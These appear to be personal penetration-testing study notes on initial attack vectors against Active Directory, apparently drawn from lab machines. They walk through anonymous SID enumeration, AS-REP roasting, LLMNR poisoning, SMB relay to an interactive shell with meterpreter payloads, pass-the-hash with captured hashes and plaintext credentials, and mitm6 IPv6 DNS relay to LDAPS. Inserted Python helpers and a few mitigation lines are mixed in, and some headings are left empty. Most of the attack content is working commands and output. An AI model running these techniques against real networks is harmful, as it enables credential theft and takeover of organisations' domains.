Initial Attack Vectors

PRACTICE ! PRACTICE ! PRACTICE !

Anonymous IPC$ share READ access

If we have READ access to IPC$ without authentication, we can list the domain users as an anonymous user

$ impacket-lookupsid anonymous@10.10.117.62 | tee users.txt
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation

Password:
[*] Brute forcing SIDs at 10.10.117.62
[*] StringBinding ncacn_np:10.10.117.62[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
498: VULNNET-RST\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: VULNNET-RST\Administrator (SidTypeUser)
501: VULNNET-RST\Guest (SidTypeUser)
502: VULNNET-RST\krbtgt (SidTypeUser)
512: VULNNET-RST\Domain Admins (SidTypeGroup)
513: VULNNET-RST\Domain Users (SidTypeGroup)
514: VULNNET-RST\Domain Guests (SidTypeGroup)
515: VULNNET-RST\Domain Computers (SidTypeGroup)
516: VULNNET-RST\Domain Controllers (SidTypeGroup)
517: VULNNET-RST\Cert Publishers (SidTypeAlias)
518: VULNNET-RST\Schema Admins (SidTypeGroup)
519: VULNNET-RST\Enterprise Admins (SidTypeGroup)
520: VULNNET-RST\Group Policy Creator Owners (SidTypeGroup)
521: VULNNET-RST\Read-only Domain Controllers (SidTypeGroup)
522: VULNNET-RST\Cloneable Domain Controllers (SidTypeGroup)
525: VULNNET-RST\Protected Users (SidTypeGroup)
526: VULNNET-RST\Key Admins (SidTypeGroup)
527: VULNNET-RST\Enterprise Key Admins (SidTypeGroup)
553: VULNNET-RST\RAS and IAS Servers (SidTypeAlias)
571: VULNNET-RST\Allowed RODC Password Replication Group (SidTypeAlias)
572: VULNNET-RST\Denied RODC Password Replication Group (SidTypeAlias)
1000: VULNNET-RST\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\DnsAdmins (SidTypeAlias)
1102: VULNNET-RST\DnsUpdateProxy (SidTypeGroup)
1104: VULNNET-RST\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\a-whitehat (SidTypeUser)
1109: VULNNET-RST\t-skid (SidTypeUser)
1110: VULNNET-RST\j-goldenhand (SidTypeUser)
1111: VULNNET-RST\j-leet (SidTypeUser)
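`tee users.txt` saves the whole lookupsid output, banner and groups included, but the `-usersfile` option used in the AS-REP roasting section expects one bare username per line. The following Python is an added example, not part of the original notes: it keeps only SidTypeUser entries, drops the machine account (trailing `$`) and, by default, the built-in RIDs below 1000; the sample input is a few lines taken from the output above.

```python
import re

# One lookupsid result line looks like "<rid>: <DOMAIN>\<name> (<SidType>)"
LOOKUPSID_LINE = re.compile(r"^\s*(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)\s*$")

def extract_users(lookupsid_output, min_rid=1000, drop_machine_accounts=True):
    """Return (domain, [usernames]) from impacket-lookupsid text output.

    Only SidTypeUser entries are kept (groups and aliases are not accounts),
    machine accounts (trailing '$') are dropped by default, and RIDs below
    min_rid (built-ins such as Administrator, Guest, krbtgt) are skipped
    unless min_rid is lowered.
    """
    domain, users = None, []
    for line in lookupsid_output.splitlines():
        m = LOOKUPSID_LINE.match(line)
        if not m:
            continue  # banner, [*] status lines, Password: prompt
        rid, dom, name, sid_type = int(m.group(1)), m.group(2), m.group(3), m.group(4)
        domain = domain or dom
        if sid_type != "SidTypeUser" or rid < min_rid:
            continue
        if drop_machine_accounts and name.endswith("$"):
            continue
        users.append(name)
    return domain, users

# Sample input: a few lines taken from the lookupsid output above.
SAMPLE = """\
Impacket v0.9.22 - Copyright 2020 SecureAuth Corporation
[*] Domain SID is: S-1-5-21-1589833671-435344116-4136949213
500: VULNNET-RST\\Administrator (SidTypeUser)
512: VULNNET-RST\\Domain Admins (SidTypeGroup)
1000: VULNNET-RST\\WIN-2BO8M1OE1M1$ (SidTypeUser)
1101: VULNNET-RST\\DnsAdmins (SidTypeAlias)
1104: VULNNET-RST\\enterprise-core-vn (SidTypeUser)
1105: VULNNET-RST\\a-whitehat (SidTypeUser)
1109: VULNNET-RST\\t-skid (SidTypeUser)
"""

if __name__ == "__main__":
    domain, users = extract_users(SAMPLE)
    with open("users.txt", "w") as fh:  # one name per line, as -usersfile expects
        fh.write("\n".join(users) + "\n")
    print(domain, users)
```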

AS-REP Roasting

AS-REP roasting is a technique against Kerberos that allows password hashes to be retrieved for users that do not require pre-authentication

If the user has "Do not require Kerberos preauthentication" enabled, an attacker can request a Kerberos AS-REP, which is encrypted with the user's RC4-HMAC key (derived from the password), and attempt to crack this ticket offline

Pre-authentication is the initial stage of Kerberos authentication, handled by the KDC's Authentication Service, and is meant to prevent exactly this kind of brute-force attack

In simple words, this means the account does not need to prove its identity before a ticket is requested for that user, so anyone can ask for the AS-REP. Once we have gathered usernames (for example via a kerbrute attack), we can use Impacket's GetNPUsers module

$ impacket-GetNPUsers -no-pass -usersfile users.txt -outputfile loot -dc-ip 10.10.10.100 spooky.local/
$ cat loot
 $krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337c

Now we can use john or hashcat to crack the Kerberos ticket :)

$ hashcat -m 18200 loot /opt/rockyou.txt
$ john loot --wordlist=/opt/rockyou.txt
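To see what is actually inside the `loot` line, here is an added Python parser (not part of the original notes) for the `$krb5asrep$23$` layout GetNPUsers writes: the 32-hex checksum is the HMAC-MD5 that RC4-HMAC (RFC 4757) places in front of the ciphertext, and the rest is the RC4-encrypted AS-REP enc-part, keyed from the user's NT hash. The sample line is constructed, with a shortened enc-part.

```python
import re
from dataclasses import dataclass

# Layout of the line GetNPUsers writes for etype 23 (hashcat mode 18200):
#   $krb5asrep$23$<user>@<REALM>:<32 hex checksum>$<hex enc-part>
ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-fA-F]{32})\$(?P<enc>[0-9a-fA-F]+)$"
)

@dataclass
class AsRepHash:
    etype: int
    user: str
    realm: str
    checksum: bytes   # 16-byte HMAC-MD5 that RC4-HMAC (RFC 4757) prepends to the ciphertext
    enc_part: bytes   # RC4 ciphertext of the enc-part; the key derives from the user's NT hash

def parse_asrep_hash(line):
    """Parse one $krb5asrep$ line into its fields, or raise ValueError."""
    m = ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    etype = int(m.group("etype"))
    if etype != 23:
        # etype 17/18 (AES) lines use a different layout and a different hashcat mode
        raise ValueError(f"etype {etype}: this parser only handles RC4-HMAC (23)")
    enc_hex = m.group("enc")
    if len(enc_hex) % 2:
        raise ValueError("enc-part hex has odd length")
    return AsRepHash(etype, m.group("user"), m.group("realm"),
                     bytes.fromhex(m.group("checksum")), bytes.fromhex(enc_hex))

def hashcat_mode(parsed):
    """hashcat mode for the parsed line (18200 = Kerberos 5 AS-REP, etype 23)."""
    return 18200 if parsed.etype == 23 else None

# Constructed sample: same shape as the 'loot' line above, enc-part shortened.
SAMPLE = "$krb5asrep$23$svc-example@EXAMPLE.LOCAL:" + "ab" * 16 + "$" + "cd" * 48

if __name__ == "__main__":
    h = parse_asrep_hash(SAMPLE)
    print(h.user, h.realm, len(h.checksum), len(h.enc_part), hashcat_mode(h))
```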

LLMNR Poisoning

LLMNR => Link-Local Multicast Name Resolution - basically DNS

  • Used to identify hosts when DNS fails to do so

  • Previously known as NBT-NS (NetBIOS Name Service)

So the key flaw is that when we respond to this service, the victim responds back to us with the user's username and their NTLMv2 hash (password hash)

  • Basically a MITM attack: the victim asks the server for some resource or share and happens to enter the resource or share name wrong

  • Ultimately DNS fails to resolve that request, and we, sitting in the middle, act like a legitimate service or user that knows the share or resource the victim wants, and tell them "I know what you're talking about"

  • "Send me the hash and I'll connect you to the share or resource" - done via Responder

  • And the attacker gets the NTLMv2 hash :)

$ sudo responder -I eth0 -rdwv

  • Now that we have the NTLMv2 hash of the rgeller user, we can simply psexec into the machine via a pass-the-hash attack, or we'll have to try cracking the hash to get the plain-text password! (Note that what Responder captures is a NetNTLMv2 challenge/response, not the NT hash itself: it can be cracked offline or relayed, but pass-the-hash needs the NT hash, like the -H value used with evil-winrm further down.)

$ hashcat -m 5600 hash /opt/rockyou.txt
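As an added example for the defender side (not part of the original notes), this Python canary asks the local link for a name that nobody owns; a healthy network stays silent, so any LLMNR answer reveals a host that is poisoning responses. It assumes IPv4 only and that multicast to 224.0.0.252 is allowed from the host running it; the response parsing is tested offline on a constructed packet.

```python
import secrets
import socket
import struct

LLMNR_GROUP, LLMNR_PORT = "224.0.0.252", 5355  # RFC 4795 multicast group and port

def build_llmnr_query(name, txid):
    """Encode an LLMNR A-record query; the wire format is DNS-style (RFC 4795)."""
    header = struct.pack("!6H", txid, 0, 1, 0, 0, 0)  # id, flags, qdcount, an, ns, ar
    labels = b"".join(bytes([len(lbl)]) + lbl.encode() for lbl in name.split("."))
    return header + labels + b"\x00" + struct.pack("!HH", 1, 1)  # QTYPE=A, QCLASS=IN

def _skip_name(pkt, pos):
    """Advance past a DNS-encoded name (label sequence or compression pointer)."""
    while pkt[pos] != 0 and pkt[pos] & 0xC0 != 0xC0:
        pos += pkt[pos] + 1
    return pos + (2 if pkt[pos] & 0xC0 == 0xC0 else 1)

def parse_llmnr_answers(pkt, txid):
    """IPv4 addresses in the answer section of a response to txid, else []."""
    if len(pkt) < 12:
        return []
    rid, flags, qd, an = struct.unpack_from("!4H", pkt, 0)
    if rid != txid or not flags & 0x8000:  # QR bit set means this is a response
        return []
    pos, addrs = 12, []
    for _ in range(qd):                    # skip the echoed question(s)
        pos = _skip_name(pkt, pos) + 4
    for _ in range(an):
        pos = _skip_name(pkt, pos)
        rtype, _cls, _ttl, rdlen = struct.unpack_from("!HHIH", pkt, pos)
        pos += 10
        if rtype == 1 and rdlen == 4:
            addrs.append(socket.inet_ntoa(pkt[pos:pos + 4]))
        pos += rdlen
    return addrs

def probe_for_poisoner(timeout=2.0):
    """Query a random name nobody owns; any answer means a host is poisoning LLMNR."""
    name, txid = "canary-" + secrets.token_hex(4), secrets.randbelow(0x10000)
    with socket.socket(socket.AF_INET, socket.SOCK_DGRAM) as s:
        s.settimeout(timeout)
        s.sendto(build_llmnr_query(name, txid), (LLMNR_GROUP, LLMNR_PORT))
        try:
            while True:
                pkt, (src, _port) = s.recvfrom(4096)
                if parse_llmnr_answers(pkt, txid):
                    return src             # the answering host is the poisoner
        except socket.timeout:
            return None
```

Run `probe_for_poisoner()` periodically from a monitoring host; a non-None result is the IP of whatever answered the canary.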

SMB Relay Attacks

Only applicable when SMB signing is disabled, or when it is enabled but not required, and the relayed user must be an administrator on the target computer!

$ nmap -sCV -A -p 139,445 10.10.10.x

  • Turn off SMB and HTTP in the Responder.conf file, run Responder listening on interface eth0, and meanwhile run the ntlmrelayx.py tool
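The condition above is exactly what nmap's smb2-security-mode script reports. As an added example (not from the original notes), this Python reads the SecurityMode field of an SMB2 NEGOTIATE response and maps it to the three cases; the sample packet is constructed, not a capture.

```python
import struct

# SecurityMode flags in the SMB2 NEGOTIATE response (MS-SMB2 section 2.2.4)
SMB2_NEGOTIATE_SIGNING_ENABLED = 0x0001
SMB2_NEGOTIATE_SIGNING_REQUIRED = 0x0002

def smb2_security_mode(packet):
    """Return the SecurityMode field from a raw SMB2 NEGOTIATE response.

    packet: bytes starting at the 64-byte SMB2 header (NetBIOS framing stripped).
    """
    if len(packet) < 64 + 4 or packet[:4] != b"\xfeSMB":
        raise ValueError("not an SMB2 packet")
    command = struct.unpack_from("<H", packet, 12)[0]   # Command field of the header
    if command != 0x0000:                               # 0x0000 = SMB2 NEGOTIATE
        raise ValueError("not a NEGOTIATE response")
    structure_size, security_mode = struct.unpack_from("<HH", packet, 64)
    if structure_size != 65:
        raise ValueError("unexpected NEGOTIATE response StructureSize")
    return security_mode

def relay_exposure(security_mode):
    """Translate SecurityMode into the condition the section above describes."""
    if security_mode & SMB2_NEGOTIATE_SIGNING_REQUIRED:
        return "signing required: relayed sessions are rejected"
    if security_mode & SMB2_NEGOTIATE_SIGNING_ENABLED:
        return "signing enabled but not required: relayable"
    return "signing disabled: relayable"

def build_negotiate_response(security_mode, dialect=0x0311):
    """Constructed sample NEGOTIATE response (not a real capture) for offline testing."""
    # Header: StructureSize 64, CreditCharge, Status, Command 0, CreditRequest,
    # Flags 1 (server to client), NextCommand, MessageId, Reserved, TreeId, SessionId
    header = b"\xfeSMB" + struct.pack("<HHIHHIIQIIQ", 64, 0, 0, 0, 1, 1, 0, 0, 0, 0, 0)
    header += bytes(16)                                # Signature (unsigned here)
    # Body: StructureSize 65, SecurityMode, DialectRevision, NegotiateContextCount,
    # then the remaining 56 fixed bytes zeroed and the 1-byte variable buffer
    body = struct.pack("<HHHH", 65, security_mode, dialect, 0) + bytes(56) + b"\x00"
    return header + body

if __name__ == "__main__":
    for mode in (0x0000, 0x0001, 0x0003):   # workstations typically 0x0001, DCs 0x0003
        print(hex(mode), relay_exposure(smb2_security_mode(build_negotiate_response(mode))))
```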

Turn on Network Discovery and File Sharing !

If the SMB connection doesn't relay back to the attack machine, try navigating to the attacker's IP from the victim's browser, since we disabled HTTP and SMB in our configuration file :)

$ sudo responder -I eth0 -dwv

$ sudo impacket-ntlmrelayx -t 192.168.169.133 -smb2support

We can get an interactive shell using the -i switch of the ntlmrelayx.py Impacket module

  • It started an interactive shell on localhost port 11000

We can list out the available shares and use them accordingly !

# shares
ADMIN$
C$
IPC$
Share

# use ADMIN$
# ls
[ REDACTED ]

We can pretty much add and get files into/from the ADMIN$ share (basically System32) and take control of the system :)

  • Create a meterpreter executable payload like exploit.exe and execute it using the -e switch of the ntlmrelayx Impacket module!

  • We can even execute a system command via the -c switch of ntlmrelayx

Mitigation Strategies

  • Enable SMB Signing on all the devices

  • Disable NTLM authentication on network

  • Account tiering

  • Local admin restriction

Gaining Shell Access

  • We can use Metasploit's psexec module (exploit/windows/smb/psexec) to gain a shell on the machine, or the PowerShell variant (exploit/windows/smb/psexec_psh)

  • We can even use Impacket's psexec module

impacket-psexec marvel.local/fcastle:Password1@192.168.57.141
smbexec.py marvel.local/fcastle:Password1@192.168.57.141
wmiexec.py marvel.local/fcastle:Password1@192.168.57.141
evil-winrm -i 10.10.10.100 -u Administrator -H 0e0363213e37b94221497260b0bcb4fc

IPv6 DNS Attacks

Every Windows or Linux machine has a network adapter with several interfaces; the two most common are the IPv4 and IPv6 interfaces. Every machine uses its IPv4 address, for which DNS is configured - but what about IPv6? Who is doing DNS for v6? It is enabled but not used!

  • So the attacker says, "Hey, I'm your DNS server", spoofs the DNS server and has all the IPv6 traffic sent to them :)

The issue here is that we can get the authentication relayed to the DC via the LDAP protocol or via SMB

Before starting the attack, make sure LDAPS is up and configured on the DC

mitm6 -d marvel.local
impacket-ntlmrelayx -6 -t ldaps://192.168.57.140 -wh fakewpad.marvel.local -l lootme

Now let's reboot the victim machine so that it refreshes all of its network configuration, such as DHCP and DNS, on every interface

  • Now the IPv6 stack asks the network "who has my DNS?"; since we are relaying connections using the Impacket module and have our mitm6 set up, we pretend to be the DNS server for IPv6

It created a new directory called lootme, which contains all the domain computers, groups, policy and trusts information with their descriptions in plain text format!

Mitigation Strategies

Pass-Back Attacks - Exploiting IoT

Other Attack Vectors and Strategies

  • Begin the day with mitm6 or Responder

Especially when users log in to their computers, in the morning around 8 or after the lunch break

  • Run scans to generate traffic

  • If scans are taking too long, look for websites in scope (Metasploit module => http_version)

  • Look for default credentials on web logins => printers, Jenkins, etc.
